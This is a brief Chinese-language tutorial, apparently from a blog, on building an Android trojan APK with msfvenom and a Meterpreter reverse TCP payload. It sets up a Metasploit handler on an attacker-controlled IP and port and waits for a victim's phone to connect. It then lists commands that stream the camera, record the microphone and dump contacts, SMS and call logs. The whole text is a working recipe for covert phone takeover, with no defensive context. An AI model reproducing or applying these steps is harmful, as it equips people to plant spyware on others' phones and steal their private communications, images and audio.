1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)。
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 > /root/apk.apk #生成apk木马,设置本机ip与自定义端口 然后启动msf: msfconsole 1.use exploit/multi/handler //加载模块 2. set payload android/meterpreter/reverse_tcp //选择Payload 3.show options //查看参数设置 这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置 1.set LHOST 172.23.0.209 //这里的地址设置成我们刚才生成木马的IP地址 2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口 3.exploit //开始执行漏洞 开始监听,等待手机上线
目标上线成功示例(当目标上线成功后,会回显出命令行):
2. 控制androiud的命令:
sysinfo //查看手机信息
webcam_list //列出网络摄像头
webcam_stream //开启摄像头
webcam_snap //从指定的摄像头获取快照
webcam_chat //开始视频聊天
dump_contacts //导出电话号码
dump_sms //导出信息
record_mic [ˈrekərd] /记录/ 从默认麦克风录制音频为X秒
check_root //检查设备是否有根
dump_calllog //获取调用日志
dump_contacts //获取联系人列表
dump_sms //获取短信
? //查看更多命令